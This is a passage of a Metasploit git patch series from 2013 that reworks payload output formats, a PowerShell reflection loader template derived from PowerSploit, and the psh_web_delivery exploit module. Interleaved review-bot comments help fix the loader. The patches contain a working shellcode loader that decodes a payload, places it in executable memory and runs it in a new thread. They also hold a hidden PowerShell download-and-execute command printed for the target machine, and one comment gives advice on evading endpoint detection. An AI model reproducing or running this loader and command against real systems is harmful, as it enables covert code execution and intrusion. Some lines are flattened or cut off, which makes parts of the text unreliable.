Msf::Util::EXE.to_bsd_x86_elf(framework, code, exeopts) - end - elsif(plat and (plat.index(Msf::Module::Platform::Solaris))) - output = case arch - when ARCH_X86,nil then to_solaris_x86_elf(framework, code, exeopts) - end - end + when 'elf' + if (not plat or (plat.index(Msf::Module::Platform::Linux))) + output = case arch + when ARCH_X86,nil then to_linux_x86_elf(framework, code, exeopts) + when ARCH_X86_64 then to_linux_x64_elf(framework, code, exeopts) + when ARCH_X64 then to_linux_x64_elf(framework, code, 
exeopts) + when ARCH_ARMLE then to_linux_armle_elf(framework, code, exeopts) + when ARCH_MIPSBE then to_linux_mipsbe_elf(framework, code, exeopts) + when ARCH_MIPSLE then to_linux_mipsle_elf(framework, code, exeopts) + end + elsif(plat and (plat.index(Msf::Module::Platform::BSD))) + output = case arch + when ARCH_X86,nil then Msf::Util::EXE.to_bsd_x86_elf(framework, code, exeopts) + end + elsif(plat and (plat.index(Msf::Module::Platform::Solaris))) + output = case arch + when ARCH_X86,nil then to_solaris_x86_elf(framework, code, exeopts) + end + end - when 'macho' - output = case arch - when ARCH_X86,nil then to_osx_x86_macho(framework, code, exeopts) - when ARCH_X86_64 then to_osx_x64_macho(framework, code, exeopts) - when ARCH_X64 then to_osx_x64_macho(framework, code, exeopts) - when ARCH_ARMLE then to_osx_arm_macho(framework, code, exeopts) - when ARCH_PPC then to_osx_ppc_macho(framework, code, exeopts) - end + when 'macho' + output = case arch + when ARCH_X86,nil then to_osx_x86_macho(framework, code, exeopts) + when ARCH_X86_64 then to_osx_x64_macho(framework, code, exeopts) + when ARCH_X64 then to_osx_x64_macho(framework, code, exeopts) + when ARCH_ARMLE then to_osx_arm_macho(framework, code, exeopts) + when ARCH_PPC then to_osx_ppc_macho(framework, code, exeopts) + end - when 'vba' - output = Msf::Util::EXE.to_vba(framework, code, exeopts) + when 'vba' + output = Msf::Util::EXE.to_vba(framework, code, exeopts) - when 'vba-exe' - exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts) - output = Msf::Util::EXE.to_exe_vba(exe) + when 'vba-exe' + exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts) + output = Msf::Util::EXE.to_exe_vba(exe) - when 'vbs' - exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts) - output = Msf::Util::EXE.to_exe_vbs(exe, exeopts.merge({ :persist => false })) + when 'vbs' + exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts) + output = Msf::Util::EXE.to_exe_vbs(exe, 
exeopts.merge({ :persist => false })) - when 'loop-vbs' - exe = exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts) - output = Msf::Util::EXE.to_exe_vbs(exe, exeopts.merge({ :persist => true })) + when 'loop-vbs' + exe = exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts) + output = Msf::Util::EXE.to_exe_vbs(exe, exeopts.merge({ :persist => true })) - when 'war' - arch ||= [ ARCH_X86 ] - tmp_plat = plat.platforms if plat - tmp_plat ||= Msf::Module::PlatformList.transform('win') - exe = Msf::Util::EXE.to_executable(framework, arch, tmp_plat, code, exeopts) - output = Msf::Util::EXE.to_jsp_war(exe) + when 'war' + arch ||= [ ARCH_X86 ] + tmp_plat = plat.platforms if plat + tmp_plat ||= Msf::Module::PlatformList.transform('win') + exe = Msf::Util::EXE.to_executable(framework, arch, tmp_plat, code, exeopts) + output = Msf::Util::EXE.to_jsp_war(exe) - when 'psh' - output = Msf::Util::EXE.to_win32pe_psh(framework, code, exeopts) + when 'psh' + output = Msf::Util::EXE.to_win32pe_psh(framework, code, exeopts) - when 'psh-net' - output = Msf::Util::EXE.to_win32pe_psh_net(framework, code, exeopts) - - when 'psh-reflection' - output = Msf::Util::EXE.to_win32pe_psh_reflection(framework, code, exeopts) + when 'psh-net' + output = Msf::Util::EXE.to_win32pe_psh_net(framework, code, exeopts) + + when 'psh-reflection' + output = Msf::Util::EXE.to_win32pe_psh_reflection(framework, code, exeopts) - end + end - output - end + output + end - def self.to_executable_fmt_formats - [ - 'dll','exe','exe-service','exe-small','exe-only','elf','macho','vba','vba-exe', - 'vbs','loop-vbs','asp','aspx','war','psh','psh-net', 'psh-reflection' - ] - end + def self.to_executable_fmt_formats + [ + 'dll','exe','exe-service','exe-small','exe-only','elf','macho','vba','vba-exe', + 'vbs','loop-vbs','asp','aspx','war','psh','psh-net', 'psh-reflection' + ] + end - # - # EICAR Canary: https://www.metasploit.com/redmine/projects/framework/wiki/EICAR - # - def 
self.is_eicar_corrupted? - path = ::File.expand_path(::File.join(::File.dirname(__FILE__), "..", "..", "..", "data", "eicar.com")) - return true if not ::File.exists?(path) + # + # EICAR Canary: https://www.metasploit.com/redmine/projects/framework/wiki/EICAR + # + def self.is_eicar_corrupted? + path = ::File.expand_path(::File.join(::File.dirname(__FILE__), "..", "..", "..", "data", "eicar.com")) + return true if not ::File.exists?(path) - begin - data = ::File.read(path) - if Digest::SHA1.hexdigest(data) != "3395856ce81f2b7382dee72602f798b642f14140" - return true - end + begin + data = ::File.read(path) + if Digest::SHA1.hexdigest(data) != "3395856ce81f2b7382dee72602f798b642f14140" + return true + end - rescue ::Exception - return true - end + rescue ::Exception + return true + end - false - end + false + end end end From 0a2917685585f5ad2738dfc68896cb968576d8ff Mon Sep 17 00:00:00 2001 From: Meatballs Date: Mon, 16 Dec 2013 09:08:01 +0000 Subject: [PATCH 05/13] Update psh_web_delivery for reflection --- LICENSE | 6 +++++- .../scripts/to_mem_pshreflection.ps1.template | 5 +---- lib/msf/util/exe.rb | 13 ++++++++----- modules/exploits/windows/misc/psh_web_delivery.rb | 4 ++-- 4 files changed, 16 insertions(+), 12 deletions(-) diff --git a/LICENSE b/LICENSE index acb2f21eca..768247fb50 100644 --- a/LICENSE +++ b/LICENSE @@ -15,8 +15,12 @@ License: BSD-3-clause # Last updated: 2013-Nov-04 # +Files: data/templates/to_mem_pshreflection.ps1.template +Copyright: 2012, Matthew Graeber +License: BSD-3-clause + Files: data/john/* -Copyright: 1996-2011 Solar Designer. +Copyright: 1996-2011 License: GPL-2 Files: external/pcaprub/* diff --git a/data/templates/scripts/to_mem_pshreflection.ps1.template b/data/templates/scripts/to_mem_pshreflection.ps1.template index c56e66cabe..92ac5dca7f 100644 --- a/data/templates/scripts/to_mem_pshreflection.ps1.template +++ b/data/templates/scripts/to_mem_pshreflection.ps1.template 
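Review bot: The `Files:` path in the new LICENSE entry, `data/templates/to_mem_pshreflection.ps1.template`, does not match the file this series actually adds at `data/templates/scripts/to_mem_pshreflection.ps1.template`, so the attribution is not associated with the real file. In the same hunk the john entry changes from `Copyright: 1996-2011 Solar Designer.` to `Copyright: 1996-2011`, which appears to drop the copyright holder unintentionally. Suggest `Files: data/templates/scripts/to_mem_pshreflection.ps1.template` for the new entry and restoring `Copyright: 1996-2011 Solar Designer` for the john entry.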
@@ -1,6 +1,3 @@ -#Added a tweaked by shellster -#Originally taken from https://github.com/mattifestation/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1 - function %{func_get_proc_address} { Param ($%{var_module}, $%{var_procedure}) $%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') @@ -21,7 +18,7 @@ function %{func_get_delegate_type} { return $%{var_type_builder}.CreateType() } -%{shellcode} +[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}") $%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, [math]::max(0x1000, $%{var_code}.Length), 0x40) $%{var_memset} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} msvcrt.dll memset), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32]))) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index e7fd88b376..f5855d2872 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -914,15 +914,17 @@ require 'msf/core/exe/segment_injector' hash_sub[:var_rwx] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_iter] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_syscode] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:shellcode] = Rex::Text.to_powershell(code, hash_sub[:var_code]) return read_replace_script_template("to_mem_old.ps1.template", hash_sub).gsub(/(? 'application/octet-stream' }) end 
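Review bot: Dropping the two attribution comments leaves the LICENSE entry added in the same commit as the only provenance record for this template, and that entry names `data/templates/to_mem_pshreflection.ps1.template` while this file lives at `data/templates/scripts/to_mem_pshreflection.ps1.template`, so the path does not match. Either correct the LICENSE path or keep a one-line pointer at the top of the template, e.g. `# Derived from PowerSploit Invoke-Shellcode (Matthew Graeber, BSD-3-clause); see LICENSE`. The removed lines were also the only place the upstream URL appeared, which matters for anyone auditing where this in-memory loader came from.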
@@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
 url = get_uri()
 download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
 print_status("Run the following command on the target machine:")
- print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"")
+ print_line("powershell.exe -w hidden -nop -ep bypass -noe -c \"#{download_and_run}\"")
 end
 end
From 637be1bdfabb846b42581222256b639971002f7d Mon Sep 17 00:00:00 2001 From: Meatballs Date: Mon, 16 Dec 2013 09:19:17 +0000 Subject: [PATCH 06/13] Should use RIG --- lib/msf/util/exe.rb | 27 +++++++++++++++------------ 1 file changed, 15 insertions(+), 12 deletions(-)
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index f5855d2872..8af3316d51 100644
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -925,18 +925,21 @@ require 'msf/core/exe/segment_injector'
 # Originally from PowerSploit
 #
 def self.to_win32pe_psh_reflection(framework, code, opts={})
- hash_sub = {}
- hash_sub[:func_get_proc_address] = Rex::Text.rand_text_alpha(rand(8)+8)
- hash_sub[:func_get_delegate_type] = Rex::Text.rand_text_alpha(rand(8)+8)
- hash_sub[:var_code] = Rex::Text.rand_text_alpha(rand(8)+8)
- hash_sub[:var_module] = Rex::Text.rand_text_alpha(rand(8)+8)
- hash_sub[:var_procedure] = Rex::Text.rand_text_alpha(rand(8)+8)
- hash_sub[:var_unsafe_native_methods] = Rex::Text.rand_text_alpha(rand(8)+8)
- hash_sub[:var_parameters] = Rex::Text.rand_text_alpha(rand(8)+8)
- hash_sub[:var_return_type] = Rex::Text.rand_text_alpha(rand(8)+8)
- hash_sub[:var_type_builder] = Rex::Text.rand_text_alpha(rand(8)+8)
- hash_sub[:var_buffer] = Rex::Text.rand_text_alpha(rand(8)+8)
- hash_sub[:var_memset] = Rex::Text.rand_text_alpha(rand(8)+8)
+ # Intialize rig and value names
+ rig = Rex::RandomIdentifierGenerator.new()
+ rig.init_var(:func_get_proc_address)
+ rig.init_var(:func_get_delegate_type)
+ rig.init_var(:var_code)
+ rig.init_var(:var_module)
+ rig.init_var(:var_procedure)
+ rig.init_var(:var_unsafe_native_methods)
+ rig.init_var(:var_parameters)
+ rig.init_var(:var_return_type)
+ rig.init_var(:var_type_builder)
+ rig.init_var(:var_buffer)
+ rig.init_var(:var_memset)
+
+ hash_sub = rig.to_h
 hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
From ee4766eceb3bdda9cadef4c2ce2fd074c0761fe4 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Mon, 16 Dec 2013 09:31:58 +0000 Subject: [PATCH 07/13] Undo psh_web_delivery_changes --- modules/exploits/windows/misc/psh_web_delivery.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/modules/exploits/windows/misc/psh_web_delivery.rb b/modules/exploits/windows/misc/psh_web_delivery.rb
index 61a7f2bc66..f85d380c6e 100644
--- a/modules/exploits/windows/misc/psh_web_delivery.rb
+++ b/modules/exploits/windows/misc/psh_web_delivery.rb
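Review bot: The only description of `to_win32pe_psh_reflection` is the context line `# Originally from PowerSploit`, which says where the template came from but not what the method returns or why a caller would pick it over `to_win32pe_psh` / `to_win32pe_psh_net`; the added comment also misspells its first word (`# Intialize rig and value names` should be `# Initialize rig and value names`). Suggest replacing the header comment with `# Returns a PowerShell script that base64-decodes +code+ and maps it into the current process through Win32 calls resolved at runtime via reflection, so nothing is compiled or written to disk; the identifier names in the template are randomised with RIG. +opts+ is not referenced in the visible portion of the method.` The method body continues past the hunk, so whether `opts` is used further down should be confirmed before the last sentence is kept.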
@@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
 def on_request_uri(cli, request)
 print_status("Delivering Payload")
- data = Msf::Util::EXE.to_win32pe_psh_reflection(framework, payload.encoded)
+ data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
 send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
 end
@@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
 url = get_uri()
 download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
 print_status("Run the following command on the target machine:")
- print_line("powershell.exe -w hidden -nop -ep bypass -noe -c \"#{download_and_run}\"")
+ print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"")
 end
 end
From 8dfcc8aa77b0927ef3694d2d82150bc48a93163f Mon Sep 17 00:00:00 2001 From: Meatballs Date: Mon, 16 Dec 2013 12:44:58 +0000 Subject: [PATCH 08/13] WaitForThread --- data/templates/scripts/to_mem_pshreflection.ps1.template | 3 ++- lib/msf/util/exe.rb | 1 + 2 files changed, 3 insertions(+), 1 deletion(-)
diff --git a/data/templates/scripts/to_mem_pshreflection.ps1.template b/data/templates/scripts/to_mem_pshreflection.ps1.template
index 92ac5dca7f..52f9986805 100644
--- a/data/templates/scripts/to_mem_pshreflection.ps1.template
+++ b/data/templates/scripts/to_mem_pshreflection.ps1.template
@@ -27,4 +27,5 @@ for ($i=0;$i -le ($%{var_code}.Length-1);$i++) {
 $%{var_memset}.Invoke([IntPtr]($%{var_buffer}.ToInt32()+$i), $%{var_code}[$i], 1) | Out-Null
 }
-[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero) | Out-Null
+$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero) | Out-Null
+[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xFFFFFFFF) | Out-Null
\ No newline at end of file
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index 8af3316d51..486076e448 100644
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -938,6 +938,7 @@ require 'msf/core/exe/segment_injector'
 rig.init_var(:var_type_builder)
 rig.init_var(:var_buffer)
 rig.init_var(:var_memset)
+ rig.init_var(:var_hthread)
 hash_sub = rig.to_h
From 25b84217aca93269e36fc644aa260eef67271cf1 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Mon, 16 Dec 2013 12:47:03 +0000 Subject: [PATCH 09/13] Correctly VAlloc --- data/templates/scripts/to_mem_pshreflection.ps1.template | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/data/templates/scripts/to_mem_pshreflection.ps1.template b/data/templates/scripts/to_mem_pshreflection.ps1.template
index 52f9986805..95b37d1b6a 100644
--- a/data/templates/scripts/to_mem_pshreflection.ps1.template
+++ b/data/templates/scripts/to_mem_pshreflection.ps1.template
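Review bot: The added CreateThread line passes the return type as `([IntPtr))` — the closing `]` is missing — so the generated script is a PowerShell parse error at this revision and nothing runs on the target; it should read `([IntPtr]))`, which is what the later "Update template" commit in this series ends up with. It is worth fixing here rather than leaving a known-broken intermediate revision, since anyone bisecting the template will land on it. The WaitForSingleObject timeout `0xFFFFFFFF` is fine as an `[Int32]` argument because PowerShell parses that hex literal as -1, but a short comment such as `# INFINITE` on that line would save the next reader the check.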
@@ -20,7 +20,7 @@ function %{func_get_delegate_type} {
 [Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
-$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, [math]::max(0x1000, $%{var_code}.Length), 0x40)
+$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
 $%{var_memset} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} msvcrt.dll memset), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32])))
 for ($i=0;$i -le ($%{var_code}.Length-1);$i++) {
From deefabb55995840bc0d5ec7ba8d88a7673e2ac44 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Mon, 16 Dec 2013 12:50:09 +0000 Subject: [PATCH 10/13] Fix license --- LICENSE | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/LICENSE b/LICENSE
index 768247fb50..a8d32ddbce 100644
--- a/LICENSE
+++ b/LICENSE
@@ -20,7 +20,7 @@ Copyright: 2012, Matthew Graeber
 License: BSD-3-clause
 Files: data/john/*
-Copyright: 1996-2011
+Copyright: 1996-2011 Solar Designer.
 License: GPL-2
 Files: external/pcaprub/*
From 14c0096115a616a0fb51c00f7e6ffbe865825f37 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Mon, 16 Dec 2013 13:38:14 +0000 Subject: [PATCH 11/13] Update template Use Copy instead of memset Remove | Out-Null --- .../scripts/to_mem_pshreflection.ps1.template | 10 +++------- lib/msf/util/exe.rb | 1 - 2 files changed, 3 insertions(+), 8 deletions(-)
diff --git a/data/templates/scripts/to_mem_pshreflection.ps1.template b/data/templates/scripts/to_mem_pshreflection.ps1.template
index 95b37d1b6a..d1a83daf0c 100644
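Review bot: The corrected VirtualAlloc call still never checks its result, so if the allocation fails the delegate returns `[IntPtr]::Zero` and the following memset loop writes through a null base, dying with an unhelpful .NET exception instead of a clear failure. Add directly after the allocation: `if ($%{var_buffer} -eq [IntPtr]::Zero) { throw 'VirtualAlloc failed' }`. The argument order is now right (size, then `0x3000` = MEM_COMMIT|MEM_RESERVE, then `0x40` = PAGE_EXECUTE_READWRITE), but the template carries no explanation of those constants, so a trailing `# MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE` comment would help. Be aware that a single RWX allocation followed by a thread start is an easy heuristic for endpoint defenses; allocating RW and switching to RX with VirtualProtect before CreateThread is a reasonable follow-up, not something this fix needs.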
--- a/data/templates/scripts/to_mem_pshreflection.ps1.template
+++ b/data/templates/scripts/to_mem_pshreflection.ps1.template
@@ -21,11 +21,7 @@ function %{func_get_delegate_type} {
 [Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
 $%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
-$%{var_memset} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} msvcrt.dll memset), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32])))
+[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)
-for ($i=0;$i -le ($%{var_code}.Length-1);$i++) {
- $%{var_memset}.Invoke([IntPtr]($%{var_buffer}.ToInt32()+$i), $%{var_code}[$i], 1) | Out-Null
-}
-
-$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero) | Out-Null
-[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xFFFFFFFF) | Out-Null
\ No newline at end of file
+$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
+[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null
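Review bot: The thread handle stored in `$%{var_hthread}` is not validated before WaitForSingleObject, so if CreateThread fails the delegate returns `[IntPtr]::Zero`, the wait fails immediately, and the script exits quietly with no payload running and no error for the operator to see. Insert `if ($%{var_hthread} -eq [IntPtr]::Zero) { throw 'CreateThread failed' }` between the two added lines. Minor: the new Marshal.Copy line uses `$%{var_code}.length` while every other reference in the template uses `.Length`; PowerShell resolves members case-insensitively so it works, but `$%{var_code}.Length` keeps the template consistent and stops the lowercase form reading like a typo. The hunk also leaves the file without a trailing newline, which the `\ No newline at end of file` marker records.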
\ No newline at end of file diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 486076e448..3465ab42db 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -937,7 +937,6 @@ require 'msf/core/exe/segment_injector' rig.init_var(:var_return_type) rig.init_var(:var_type_builder) rig.init_var(:var_buffer) - rig.init_var(:var_memset) rig.init_var(:var_hthread) hash_sub = rig.to_h From dd5b66f8271e2047d57dab249c3571783af1f5e7 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Mon, 16 Dec 2013 13:42:37 +0000 Subject: [PATCH 12/13] Undo psh net change --- lib/msf/util/exe.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 3465ab42db..01f716427d 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -900,6 +900,7 @@ require 'msf/core/exe/segment_injector' hash_sub[:var_compileParams] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_syscode] = Rex::Text.rand_text_alpha(rand(8)+8) + hash_sub[:b64shellcode] = Rex::Text.encode_base64(code) return read_replace_script_template("to_mem_dotnet.ps1.template", hash_sub).gsub(/(? Date: Mon, 16 Dec 2013 13:43:40 +0000 Subject: [PATCH 13/13] Undo psh net change --- lib/msf/util/exe.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 01f716427d..21e39b1906 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -900,7 +900,6 @@ require 'msf/core/exe/segment_injector' hash_sub[:var_compileParams] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_syscode] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:b64shellcode] = Rex::Text.encode_base64(code) return read_replace_script_template("to_mem_dotnet.ps1.template", hash_sub).gsub(/(?